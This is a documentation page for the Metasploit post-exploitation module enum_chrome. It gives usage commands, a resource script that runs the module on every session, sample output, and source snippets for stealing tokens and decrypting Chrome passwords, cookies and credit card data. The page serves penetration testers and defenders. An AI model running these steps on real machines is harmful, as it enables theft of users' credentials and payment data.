Windows Gather Google Chrome User Data Enumeration - Metasploit
This page contains detailed information about how to use the post/windows/gather/enum_chrome metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows Gather Google Chrome User Data Enumeration
Module: post/windows/gather/enum_chrome
Source code: modules/post/windows/gather/enum_chrome.rb
Disclosure date: -
Last modification time: 2022-02-18 02:45:09 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will collect user data from Google Chrome and attempt to decrypt sensitive information.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/gather/enum_chrome
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/gather/enum_chrome
msf post(enum_chrome) > show options
... show and set options ...
msf post(enum_chrome) > set SESSION session-id
msf post(enum_chrome) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/gather/enum_chrome")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This post-exploitation module will extract saved user data from Google Chrome and attempt to decrypt sensitive information. Chrome encrypts sensitive data (passwords and credit card information) which can only be decrypted with the same logon credentials. This module tries to decrypt the sensitive data as the current user unless told otherwise via the MIGRATE setting.
Verification Steps
- Start
msfconsole
- Get meterpreter session
- Do:
use post/windows/gather/enum_chrome
- Do:
set SESSION <session id>
- Do:
run
- You should be able to see the extracted chrome browser data in the loot files in JSON format
Options
MIGRATE - Migrate automatically to explorer.exe. This is useful if you're having SYSTEM privileges, because the process on the target system running meterpreter needs to be owned by the user the data belongs to. If activated the migration is done using the metasploit
post/windows/manage/migrate
module. The default value is false.SESSION - The session to run the module on.
Extracted data
- Web data:
- General autofill data
- Chrome users
- Credit card data
- Cookies
- History
- URL history
- Download history
- Search term history
- Login data (username/password)
- Bookmarks
- Preferences
Scenarios
Meterpreter session as normal user
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.104:51129) at 2016-10-13 20:45:50 +0200
msf exploit(handler) > use post/windows/gather/enum_chrome
msf post(enum_chrome) > set SESSION 1
SESSION => 1
msf post(enum_chrome) > run
[*] Impersonating token: 3156
[*] Running as user 'user-PC\user'...
[*] Extracting data for user 'user'...
[*] Downloaded Web Data to '/home/user/.msf4/loot/20161013205236_default_192.168.1.18_chrome.raw.WebD_032796.txt'
[*] Downloaded Cookies to '/home/user/.msf4/loot/20161013205238_default_192.168.1.18_chrome.raw.Cooki_749912.txt'
[*] Downloaded History to '/home/user/.msf4/loot/20161013205244_default_192.168.1.18_chrome.raw.Histo_307144.txt'
[*] Downloaded Login Data to '/home/user/.msf4/loot/20161013205309_default_192.168.1.18_chrome.raw.Login_519738.txt'
[*] Downloaded Bookmarks to '/home/user/.msf4/loot/20161013205310_default_192.168.1.18_chrome.raw.Bookm_593102.txt'
[*] Downloaded Preferences to '/home/user/.msf4/loot/20161013205311_default_192.168.1.18_chrome.raw.Prefe_742084.txt'
[*] Decrypted data saved in: /home/user/.msf4/loot/20161013205909_default_192.168.1.18_chrome.decrypted_173440.txt
[*] Post module execution completed
Meterpreter session as system
In this case, you should set the MIGRATE setting to true. The module will try to migrate to explorer.exe to decrypt the encrypted data. After the decryption is done, the script will migrate back into the original process.
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.104:51129) at 2016-10-13 20:45:50 +0200
msf exploit(handler) > use post/windows/gather/enum_chrome
msf post(enum_chrome) > set SESSION 1
SESSION => 1
msf post(enum_chrome) > set MIGRATE true
MIGRATE => true
msf post(enum_chrome) > run
[*] current PID is 1100. migrating into explorer.exe, PID=2916...
[*] done.
[*] Running as user 'user-PC\user'...
[*] Extracting data for user 'user'...
[*] Downloaded Web Data to '/home/user/.msf4/loot/20161013205236_default_192.168.1.18_chrome.raw.WebD_032796.txt'
[*] Downloaded Cookies to '/home/user/.msf4/loot/20161013205238_default_192.168.1.18_chrome.raw.Cooki_749912.txt'
[*] Downloaded History to '/home/user/.msf4/loot/20161013205244_default_192.168.1.18_chrome.raw.Histo_307144.txt'
[*] Downloaded Login Data to '/home/user/.msf4/loot/20161013205309_default_192.168.1.18_chrome.raw.Login_519738.txt'
[*] Downloaded Bookmarks to '/home/user/.msf4/loot/20161013205310_default_192.168.1.18_chrome.raw.Bookm_593102.txt'
[*] Downloaded Preferences to '/home/user/.msf4/loot/20161013205311_default_192.168.1.18_chrome.raw.Prefe_742084.txt'
[*] Decrypted data saved in: /home/user/.msf4/loot/20161013205909_default_192.168.1.18_chrome.decrypted_173440.txt
[*] migrating back into PID=1100...
[*] done.
[*] Post module execution completed
Go back to menu.
Msfconsole Usage
Here is how the windows/gather/enum_chrome post exploitation module looks in the msfconsole:
msf6 > use post/windows/gather/enum_chrome
msf6 post(windows/gather/enum_chrome) > show info
Name: Windows Gather Google Chrome User Data Enumeration
Module: post/windows/gather/enum_chrome
Platform: Windows
Arch:
Rank: Normal
Provided by:
Sven Taute
sinn3r <[email protected]>
Kx499
mubix <[email protected]>
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
MIGRATE false no Automatically migrate to explorer.exe
SESSION yes The session to run this module on.
Description:
This module will collect user data from Google Chrome and attempt to
decrypt sensitive information.
Module Options
This is a complete list of options available in the windows/gather/enum_chrome post exploitation module:
msf6 post(windows/gather/enum_chrome) > show options
Module options (post/windows/gather/enum_chrome):
Name Current Setting Required Description
---- --------------- -------- -----------
MIGRATE false no Automatically migrate to explorer.exe
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the windows/gather/enum_chrome post exploitation module:
msf6 post(windows/gather/enum_chrome) > show advanced
Module advanced options (post/windows/gather/enum_chrome):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/gather/enum_chrome module can do:
msf6 post(windows/gather/enum_chrome) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/gather/enum_chrome post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/gather/enum_chrome) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
==> Mailvelope database not found
Here is a relevant code snippet related to the "==> Mailvelope database not found" error message:
58:
59: def extension_mailvelope(username, extname)
60: chrome_path = @profiles_path + "\\" + username + @data_path
61: maildb_path = chrome_path + "/Local Storage/chrome-extension_#{extname}_0.localstorage"
62: if file_exist?(maildb_path) == false
63: print_error("==> Mailvelope database not found")
64: return
65: end
66: print_status("==> Downloading Mailvelope database...")
67: local_path = store_loot("chrome.ext.mailvelope", "text/plain", session, "chrome_ext_mailvelope")
68: session.fs.file.download_file(local_path, maildb_path)
<F> not found
Here is a relevant code snippet related to the "<F> not found" error message:
183: @chrome_files.map { |e| e[:in_file] }.uniq.each do |f|
184: remote_path = chrome_path + '\\' + f
185:
186: # Verify the path before downloading the file
187: if file_exist?(remote_path) == false
188: print_error("#{f} not found")
189: next
190: end
191:
192: # Store raw data
193: local_path = store_loot("chrome.raw.#{f}", "text/plain", session, "chrome_raw_#{f}")
No explorer.exe process to impersonate.
Here is a relevant code snippet related to the "No explorer.exe process to impersonate." error message:
212: current_pid = session.sys.process.open.pid
213: target_pid = session.sys.process["explorer.exe"]
214: return if target_pid == current_pid
215:
216: if target_pid.to_s.empty?
217: print_warning("No explorer.exe process to impersonate.")
218: return
219: end
220:
221: print_status("Impersonating token: #{target_pid}")
222: begin
Cannot impersonate: <E.MESSAGE.TO_S>
Here is a relevant code snippet related to the "Cannot impersonate: <E.MESSAGE.TO_S>" error message:
221: print_status("Impersonating token: #{target_pid}")
222: begin
223: session.sys.config.steal_token(target_pid)
224: return true
225: rescue Rex::Post::Meterpreter::RequestError => e
226: print_error("Cannot impersonate: #{e.message.to_s}")
227: return false
228: end
229: end
230:
231: def migrate(pid = nil)
(Automatic decryption will not be possible. You might want to manually migrate, or set "MIGRATE=true")
Here is a relevant code snippet related to the "(Automatic decryption will not be possible. You might want to manually migrate, or set "MIGRATE=true")" error message:
297:
298: # Get user(s)
299: usernames = []
300: if is_system?
301: print_status("Running as SYSTEM, extracting user list...")
302: print_warning("(Automatic decryption will not be possible. You might want to manually migrate, or set \"MIGRATE=true\")")
303: session.fs.dir.foreach(@profiles_path) do |u|
304: not_actually_users = [
305: ".", "..", "All Users", "Default", "Default User", "Public", "desktop.ini",
306: "LocalService", "NetworkService"
307: ]
SQLite3 is not available, and we are not able to parse the database.
Here is a relevant code snippet related to the "SQLite3 is not available, and we are not able to parse the database." error message:
316:
317: has_sqlite3 = true
318: begin
319: require 'sqlite3'
320: rescue LoadError
321: print_warning("SQLite3 is not available, and we are not able to parse the database.")
322: has_sqlite3 = false
323: end
324:
325: # Process files for each username
326: usernames.each do |u|
Go back to menu.
Related Pull Requests
- #9010 Merged Pull Request: remove checks for hardcoded SYSTEM Account name
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7200 Merged Pull Request: Rex::Ui::Text cleanup
- #6997 Merged Pull Request: Avoid exception on missing key in prefs.
- #6668 Merged Pull Request: Fix #6569, Add a check for USERNAME env var in enum_chrome post mod
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #6644 Merged Pull Request: Preserve default types for datastore options
- #2782 Merged Pull Request: Stop abusing expand path
- #2525 Merged Pull Request: Change module boilerplate
- #2304 Merged Pull Request: Fix load order in posts, hopefully forever
- #2243 Merged Pull Request: [FixRM #8312] - Fix file handle leaks
- #1241 Merged Pull Request: Removed all $Id$ and $Revision$ occurences
- #958 Merged Pull Request: Msftidy 2
Go back to menu.
See Also
Check also the following modules related to this module:
- post/windows/gather/enum_ad_bitlocker
- post/windows/gather/enum_ad_computers
- post/windows/gather/enum_ad_groups
- post/windows/gather/enum_ad_managedby_groups
- post/windows/gather/enum_ad_service_principal_names
- post/windows/gather/enum_ad_to_wordlist
- post/windows/gather/enum_ad_user_comments
- post/windows/gather/enum_ad_users
- post/windows/gather/enum_applications
- post/windows/gather/enum_artifacts
- post/windows/gather/enum_av
- post/windows/gather/enum_av_excluded
- post/windows/gather/enum_chocolatey_applications
- post/windows/gather/enum_computers
- post/windows/gather/enum_db
- post/windows/gather/enum_devices
- post/windows/gather/enum_dirperms
- post/windows/gather/enum_domain
- post/windows/gather/enum_domain_group_users
- post/windows/gather/enum_domains
- post/windows/gather/enum_domain_tokens
- post/windows/gather/enum_domain_users
- post/windows/gather/enum_emet
- post/windows/gather/enum_files
- post/windows/gather/enum_hostfile
- post/windows/gather/enum_hyperv_vms
- post/windows/gather/enum_ie
- post/windows/gather/enum_logged_on_users
- post/windows/gather/enum_ms_product_keys
- post/windows/gather/enum_muicache
- post/windows/gather/enum_onedrive
- post/windows/gather/enum_patches
- post/windows/gather/enum_powershell_env
- post/windows/gather/enum_prefetch
- post/windows/gather/enum_proxy
- post/windows/gather/enum_putty_saved_sessions
- post/windows/gather/enum_services
- post/windows/gather/enum_shares
- post/windows/gather/enum_snmp
- post/windows/gather/enum_termserv
- post/windows/gather/enum_tokens
- post/windows/gather/enum_tomcat
- post/windows/gather/enum_trusted_locations
- post/windows/gather/enum_unattend
Authors
- Sven Taute
- sinn3r
- Kx499
- mubix
Version
This page has been produced using Metasploit Framework version 6.1.41-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.